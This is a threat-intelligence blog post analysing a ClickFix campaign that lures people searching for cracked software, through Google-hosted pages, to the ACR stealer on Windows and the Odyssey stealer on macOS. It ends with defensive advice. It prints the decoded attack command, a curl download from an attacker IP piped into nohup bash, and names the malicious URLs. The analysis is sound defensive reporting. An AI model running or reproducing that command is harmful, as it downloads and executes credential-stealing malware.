Cybercriminals need steady streams of fresh credentials, personal data and financial data to carry out fraud and other kinds of online schemes. The collector of this data is often malicious software, or malware, which infects end user computers and vacuums up a prolific amount of data. The data ends up on underground markets such as the Russian Market, where it is sold to other actors in tranches called “logs.” But the first step is landing malware on a person’s computer, and a social-engineering technique dubbed “ClickFix” has been increasingly seen over the last year to accomplish this. ClickFix typically involves tricking a user into copying a command or script and entering it into the command line on a Windows or macOS machine. The script usually leads to the downloading of malware.
Despite seeming to be a ham-fisted attempt to get unsuspecting users to willingly install malware, it has been extraordinarily successful, so much so that advanced persistent threat (APT) actors are using it as well as financially motivated cybercriminals. Microsoft found ClickFix was the most common initial access scheme in its 2025 Digital Defense Report, representing 47% of all initial access methods. ClickFix has been successful for a few reasons. One is that ClickFix threats are usually not coming through email, which means email security solutions are out of the loop. Users come across ClickFix schemes through organic web searches that return malicious pages, as well as direct messages through social platforms and comments on videos. Antiphishing and browser security firm Push Security notes in a recent blog that the malicious script is copied inside browser sandboxes, which means other security tools don’t see it. Microsoft writes that the commands “pull malicious payloads directly into memory—a clean, fileless process that is often invisible to traditional security tools.” Once run, it’s up to endpoint, detection and response (EDR) software to catch it, which Push Security posits is the last line of defense.
In this blog post, we will analyze a malware campaign that used ClickFix in an infection chain that targeted both Windows and macOS users with information-stealing malware, known as infostealers. This campaign hinged on attracting users who had conducted searches for “cracked” software, which is the term for software whose copyright protections can be circumvented. This is a tried-and-true lure for attracting potential victims.
In June 2025, we did something no one should do: We conducted a proactive search for cracked software in hopes of finding malware. It didn’t take long, and our Malware Intelligence Team uncovered a new wave of bogus software malware distribution campaigns. Because direct links to servers hosting malware, such as those on bulletproof hosting (BPH) services (see our blog “Bulletproof hosting: A critical cybercriminal service”), are often blocked, threat actors will use a series of hop points less likely to be blocked before the malicious link or script is delivered. In the observed campaign, search results led to landing pages on Google-hosted services, such as Colab, Drive, Looker Studio, Sites and Groups. These pages are then used to direct users to secondary landing pages. Attackers do this because it’s less likely that Google services will be outright blocked by administrators.
These pages also act as filters. Depending on the visitor’s operating system (OS), victims were directed to infostealers for either Windows or macOS machines. Windows users were funneled to a tape (.tar) archive containing the ACR aka Acreed stealer on the MEGA file-hosting service. MacOS users were directed down a different path to a webpage that mimics a legitimate Cloudflare security check. The next step was the ClickFix trick, which if a user complied, led to the download and execution of the Odyssey macOS stealer, which is a variation of the Poseidon stealer (see below).
The image depicts the infection chain leveraged to deploy the ACR and Odyssey information stealers June 25, 2025.
There are indications that the malware campaigns were successful in capturing voluminous amounts of data. In early June 2025, we noted 133,980 new ACR stealer logs uploaded to the Russian Market in May alone — a nearly 700% increase from the previous month. This surge indicated the malware was being distributed through highly effective campaigns such as the one we observed that use the same lure infrastructure to infect Windows and macOS users. This report highlights examples of both the ACR and Odyssey stealers and examines their associated campaigns and payloads.
We first discovered the campaign through proactive searches for cracked software, using queries such as “download free cracked software for Windows site:google.com” and “download free cracked software 2025 site:google.com.” Reviewing several top results on a Windows host ultimately led to the download of the ACR infostealer, which targets Windows users.
The image depicts a screenshot of a Google search leading to the download of the ACR information stealer June 20, 2025.
In the image above, we can see a search result for a purported software crack for the virtual private network (VPN) product NordVPN. When a user clicks the search result, they are routed to a Google Colab development environment with a "Download Link" button.
The image depicts a screenshot of a Google search leading to the download of the ACR information stealer June 20, 2025.
Selecting this button redirects to a webpage where a “Download Now” button appears.
The image depicts a screenshot of a website leading to the download of the ACR information stealer June 20, 2025.
Pressing that button opens an intermediary page instructing the victim to copy and paste a MEGA URL into the browser. Following this link finally accesses the MEGA page hosting a .tar archive (see two figures below).
The image depicts an intermediary page instructing the victim to copy and paste a MEGA URL into the browser June 20, 2025.
The image depicts the MEGA page hosting the initial ZIP archive June 20, 2025.
The downloaded .tar file includes a password-protected compressed (.ZIP) archive (i.e., SETUP.zip) file. Extracting this archive reveals an executable file (i.e., setup.exe), which we confirmed included the ACR stealer payload. ACR not only acts as an infostealer, however. It also has been employed as a “loader,” which is the name for a piece of malware that is used to download other follow-on malware to a machine. We observed ACR used as a loader to install cryptocurrency “clipper” malware that we dubbed SharkClipper based on the file name in the download URLs and various strings. Clippers monitor a user’s clipboard for cryptocurrency addresses and replace copied addresses with ones the attackers control. Users unwittingly copy the adversary addresses when making a transaction, losing control of their cryptocurrency.
When we tested the same NordVPN crack link on macOS, the initial redirect from Google Colab still led to https://drapk.net/after-verification-click-go-to-download-page/, but clicking the “Download Now” button no longer triggered a second redirect. Instead, the user was shown a webpage that mimics a legitimate Cloudflare security check page at https://apposx.com/index2.php, which instructs them to run a ClickFix command.
The image depicts a fake Cloudflare security check which prompts users to run a ClickFix command June 20, 2025.
What is presented as the string to copy is not actually what is copied. Instead, it is a Base64-encoded shell command that when decoded is actually a CURL command that fetches a payload and continues to run it in the background:
curl -s http://45.135.232.33/d/roberto39774 | nohup bash &
Examining the “roberto39774” AppleScript confirmed the Odyssey infostealer was hosted on that IP address June 23, 2025.
On execution, Odyssey collects user data, including passwords, cookies, cryptocurrency wallets, documents that match a particular extension, Apple Notes, Keychain entries and system metadata. It then compresses everything into “out.zip” and exfiltrates the archive via a POST request to the attacker-controller server. The same IP hosted Odyssey’s control panel login page as seen below.
Since December 2024, we have been monitoring the volume of infostealer logs traded on the Russian Market, which sells logs from eight different malware families, including ACR. Tracking the number of logs for each stealer allows us to gauge activity levels and detect emerging cyber threat trends. A spike in logs tied to a particular stealer family often indicates a surge in distribution or reflects the success of ongoing campaigns.
ACR stealer was added to the Russian Market at the end of February 2025. Initially, the number of logs added was relatively modest. However, in May 2025, we observed a significant spike when 133,980 ACR logs were added, marking a whopping 690% increase compared to April 2025. Between June 1, 2025, and June 25, 2025, an additional 115,456 new logs were added, bringing the total number of ACR logs available on the Russian Market to 238,768.
The use of cracked software as a vector for malware distribution has long been a prevalent tactic within the cybercriminal landscape. While this strategy typically is associated with Windows-based malware, this particular campaign is noteworthy for its focus on macOS — a relatively novel target for such activities. Current trend analyses indicate the threat actors behind this campaign diversified their delivery mechanisms to enhance their reach across various platforms, distributing both ACR for Windows and Odyssey for macOS within a consolidated infrastructure.
This shift underscores a growing recognition among cybercriminals of the untapped potential within the macOS user base, particularly as more organizations increasingly integrate macOS into their operating environments. Many users operate under the misconception that macOS inherently is more secure due to the comparatively lower incidence of malware targeting the platform. This false sense of security renders them more susceptible to emerging threats since they tend to be less prepared for such campaigns.
Moving forward, it is imperative for organizations to reevaluate their endpoint security strategies to ensure macOS devices receive the same level of protection and monitoring as their Windows counterparts. This should include the deployment of cross-platform endpoint detection and response (EDR) software, the enforcement of strict application policies and the enhancement of user awareness regarding the inherent risks associated with the use of pirated software (see recommendations below).
Avoid using cracked software: Do not download or install cracked versions of software. These versions often contain malware that can compromise your system's security. Always use official and licensed software to receive the latest security updates and patches.
Implement strict software policies: Establish a strict policy against the use of unlicensed software. Utilize software inventory tools to monitor compliance and ensure all installed applications are licensed and updated properly.
Implement network security measures: Employ advanced network security tools, including firewalls and intrusion detection systems (IDSs), to protect against unauthorized access and detect and mitigate malicious activity.
Monitor process executions: Implement alerts for abnormal process chains that deviate from normal business operations to detect potential malware threats. Establish baseline behaviors to distinguish between legitimate activity and suspicious anomalies clearly.
Deploy indicators of compromise: Consider deploying the indicators of compromise (IoCs) available in our platform for timely detection of potential threats.
User education: Train users to exercise caution when downloading executable files from the internet.
This is an excerpt from a longer Malware Campaign Report from Intel 471’s Malware Intelligence Team that includes more technical information as well as detection and threat-hunting strategies. For more information, please contact Intel 471.
Intel 471 discovered a new Android trojan, FvncBot, that masquerades as a security application for mBank, a major Polish bank. Our Malware Intelligence team analyzed its code, which is new and not based on other leaked malware code.
Payment card "checkers" are used by criminal hackers to check the validity of stolen payment card details. Here's how this in-demand underground service works.
Threat actors are increasingly using methods to circumvent multifactor authentication, which poses a risk of account takeover. Here’s a briefing on some types of attacks and defenses to put in place.
Stay informed with our weekly executive update, sending you the latest news and timely data on the threats, risks, and regulations affecting your organization.